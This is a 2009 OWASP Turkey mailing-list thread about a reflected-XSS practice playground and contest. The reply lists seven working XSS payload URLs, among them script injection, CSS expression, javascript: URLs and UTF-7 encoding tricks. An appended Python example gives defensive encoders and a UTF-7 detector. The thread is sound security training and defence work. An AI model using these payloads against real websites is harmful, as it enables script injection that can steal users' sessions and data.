<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html><head><title>Re: [Owasp-turkey] Reflected XSS Playground and Contest</title>
<META http-equiv=Content-Type content="text/html; charset=utf-8">
<meta http-equiv="Content-Style-Type" content="text/css">
<style type="text/css"><!--
body {
  margin: 5px 5px 5px 5px;
  background-color: #ffffff;
}
/* ========== Text Styles ========== */
hr { color: #000000}
body, table /* Normal text */
{
 font-size: 10pt;
 font-family: 'Arial';
 font-style: normal;
 font-weight: normal;
 color: #000000;
 text-decoration: none;
}
span.rvts1 /* Heading */
{
 font-weight: bold;
 color: #0000ff;
}
span.rvts2 /* Subheading */
{
 font-weight: bold;
 color: #000080;
}
span.rvts3 /* Keywords */
{
 font-style: italic;
 color: #800000;
}
a.rvts4, span.rvts4 /* Jump 1 */
{
 color: #008000;
 text-decoration: underline;
}
a.rvts5, span.rvts5 /* Jump 2 */
{
 color: #008000;
 text-decoration: underline;
}
span.rvts6
{
 font-size: 9pt;
}
span.rvts7
{
 font-size: 8pt;
 font-family: 'tahoma';
}
a.rvts8, span.rvts8
{
 font-size: 8pt;
 font-family: 'tahoma';
 color: #0000ff;
 text-decoration: underline;
}
a.rvts9, span.rvts9
{
 font-size: 8pt;
 font-family: 'tahoma';
 color: #0000ff;
 background-color: #ffffff;
 text-decoration: underline;
}
span.rvts10
{
 font-size: 13pt;
 font-family: 'times new roman';
 background-color: #ffffff;
 text-decoration: underline;
}
span.rvts11
{
 font-size: 13pt;
 font-family: 'times new roman';
}
/* ========== Para Styles ========== */
p,ul,ol /* Paragraph Style */
{
 text-align: left;
 text-indent: 0px;
 padding: 0px 0px 0px 0px;
 margin: 0px 0px 0px 0px;
}
.rvps1 /* Centered */
{
 text-align: center;
}
--></style>
</head>
<body>

<p><span class=rvts6>Hello,</span></p>
<p><span class=rvts6><br></span></p>
<p><span class=rvts6>Very nice application, well done.</span></p>
<p><span class=rvts6><br></span></p>
<p><span class=rvts6>1) (FF3) http://www.webguvenligi.org/xsstb/reflected.php?vector1=&lt;script&gt;alert(1)&lt;/script&gt;a</span></p>
<p><span class=rvts6>2) (FF3) http://www.webguvenligi.org/xsstb/reflected.php?vector2="&gt;&lt;script&gt;alert(1)&lt;/script&gt;a</span></p>
<p><span class=rvts6>3) (IE6) http://www.webguvenligi.org/xsstb/reflected.php?vector3=background-image:url(javascript:alert(1))</span></p>
<p><span class=rvts6>or (IE8) http://www.webguvenligi.org/xsstb/reflected.php?vector3=width:expression(alert(1));</span></p>
<p><span class=rvts6>4) (FF3) http://www.webguvenligi.org/xsstb/reflected.php?vector4=%3C/script%3E%3Cscript%3Ealert(1);%3C/script%3E</span></p>
<p><span class=rvts6>5) (FF3) http://www.webguvenligi.org/xsstb/reflected.php?vector5=%3Ciframe%20src=javascript:alert(1)%3E</span></p>
<p><span class=rvts6>6) (IE7, encoding auto-select[1]) http://www.webguvenligi.org/xsstb/reflected.php?vector6=%2bADw-script%2bAD4-%0d%0aalert(1)%2bADw-%2fscript%2bAD4-</span></p>
<p><span class=rvts6>7) (IE6) http://www.webguvenligi.org/xsstb/reflected.php?vector7=blue;background-image:url(javascript:alert(1))</span></p>
<p><span class=rvts6><br></span></p>
<p><span class=rvts6><br></span></p>
<p><span class=rvts6>[1] IE charset encoding Auto-Selection:</span></p>
<p><span class=rvts6>If 'Encoding' is set to 'Auto-Select' and Internet Explorer finds a UTF-7 string in the first 4096 characters of the response body, it will set the charset encoding to UTF-7 automatically, unless a certain charset encoding is already enforced.</span></p>
<p><span class=rvts6><br></span></p>
<p><span class=rvts6><br></span></p>
<p><span class=rvts6>Sertan Kolat</span></p>
<p><br></p>
<p><span class=rvts6>On Monday, June 15, 2009, 1:06:17 PM, you wrote:</span></p>
<div><table border=0 cellpadding=1 cellspacing=2 style="background-color: #ffffff;">
<tr valign=top>
<td width=1 style="background-color: #0000ff;"><br>
</td>
<td width=776>
<p><span class=rvts7>Hello,</span></p>
<p><span class=rvts7>At&nbsp;</span><a class=rvts8 href="http://www.webguvenligi.org/xsstb/reflected.php">http://www.webguvenligi.org/xsstb/reflected.php</a><span class=rvts7>&nbsp;you can access a "playground" application where you can learn and practise different Reflected XSS techniques.</span></p>
<p><span class=rvts7>The application has XSS attack vectors that can be applied to 7 parameters (vector1, vector2, ..., vector7). To the first two people who exploit these vectors and send a link like the one I give below as a reply-all to this mail, I will send:</span></p>
<p><span class=rvts7>&nbsp;</span></p>
<p><span class=rvts7>1st place: a 7-day, 7-night trip for 2 to the Maldives</span></p>
<p><span class=rvts7>2nd place: a latest-model car</span></p>
<p><span class=rvts7>&nbsp;</span></p>
<p><span class=rvts7>Yeah, right!...</span></p>
<p><span class=rvts7>&nbsp;</span></p>
<p><span class=rvts7>1st place: an OWASP Membership T-Shirt (L)</span></p>
<p><span class=rvts7>2nd place: an OWASP Membership DVD</span></p>
<p><span class=rvts7>&nbsp;</span></p>
<p><span class=rvts7>That is what I will send.</span></p>
<p><span class=rvts7>&nbsp;</span></p>
<p><span class=rvts7>Example; (the first hint is on me)</span></p>
<p><a class=rvts8 href="http://www.webguvenligi.org/xsstb/reflected.php?vector1=%3Cscript%3Ealert(1)%3C/script%3E">http://www.webguvenligi.org/xsstb/reflected.php?vector1=%3Cscript%3Ealert(1)%3C/script%3E</a></p>
<p><span class=rvts7>&nbsp;</span></p>
<p><span class=rvts7>&nbsp;</span></p>
<p><span class=rvts7>Note 1: it is enough to print 1 inside an alert box on the screen</span></p>
<p><span class=rvts7>Note 2: what matters is the order of arrival in the owasp-tr mail archives</span></p>
<p><span class=rvts7>Note 3: the gifts I wrote last are the valid ones! Don't come back later with "oh, I didn't see that"</span></p>
<p><span class=rvts7>&nbsp;</span></p>
<p><span class=rvts7>Project post:&nbsp;</span><a class=rvts8 href="http://www.webguvenligi.org/projeler/reflected-xss-oyun-grubu.html">http://www.webguvenligi.org/projeler/reflected-xss-oyun-grubu.html</a></p>
<p><span class=rvts7>--&nbsp;</span></p>
<p><span class=rvts7>Bedirhan Urgun</span></p>
<p><a class=rvts9 href="http://www.webguvenligi.org">http://www.webguvenligi.org</a></p>
<p><a class=rvts9 href="http://www.owasp.org/index.php/Turkey">http://www.owasp.org/index.php/Turkey</a></p>
<p><br></p>
<p><span class=rvts7>To subscribe to the Turkish Web Application Security mailing list:&nbsp;</span></p>
<p><a class=rvts9 href="https://lists.owasp.org/mailman/listinfo/owasp-turkey">https://lists.owasp.org/mailman/listinfo/owasp-turkey</a></p>
</td>
</tr>
</table>
</div>
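<p><span class=rvts6>Added example (not from either poster, and not the playground's own server-side code, which this thread does not show): a context-aware output encoder for the seven reflection contexts listed in the reply above, plus the charset check and UTF-7 detection that follow from the note on IE's Auto-Select. All function names and sample values are constructed for illustration.</span></p>

```python
import html
import json
import re

# Hypothetical encoders, one per reflection context of the playground's
# vector1..vector7 parameters (names constructed for this example).

def encode_html(value: str) -> str:
    """vector1 (HTML text) and vector2 (quoted attribute): escape the
    metacharacters; templates must also always quote attribute values."""
    return html.escape(value, quote=True)

def encode_css_value(value: str) -> str:
    """vector3 / vector7 (inside a style declaration): escaping is not
    enough for CSS, so allow-list a small grammar and reject the rest."""
    if re.fullmatch(r"[A-Za-z]{1,20}|#[0-9A-Fa-f]{3,6}|\d{1,4}(px|em|%)", value):
        return value
    return "inherit"

def encode_js_string(value: str) -> str:
    """vector4 (inside <script>): JSON-encode and escape '<' so a reflected
    '</script>' can never close the script block early."""
    return json.dumps(value).replace("<", "\\u003c")

def safe_src_url(value: str) -> str:
    """vector5 (iframe/img src): only absolute http(s) URLs pass, so
    javascript: URLs and injected markup never reach the attribute."""
    if re.fullmatch(r"https?://[^\s\"'<>]+", value):
        return html.escape(value, quote=True)
    return "about:blank"

def response_pins_charset(headers: dict) -> bool:
    """vector6: IE's Auto-Select only switches to UTF-7 when no charset is
    enforced, so the fix is an explicit charset in Content-Type."""
    return "charset=" in headers.get("Content-Type", "").lower()

# UTF-7 shift sequence: '+', modified-base64 payload, '-' (e.g. +ADw- is '<')
UTF7_SHIFT = re.compile(r"\+[A-Za-z0-9+/]{2,}-")

def utf7_in_sniff_window(body: str) -> bool:
    """Detection: do the first 4096 characters (the window the note
    mentions) contain a UTF-7 shift sequence?"""
    return UTF7_SHIFT.search(body[:4096]) is not None
```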

</body></html>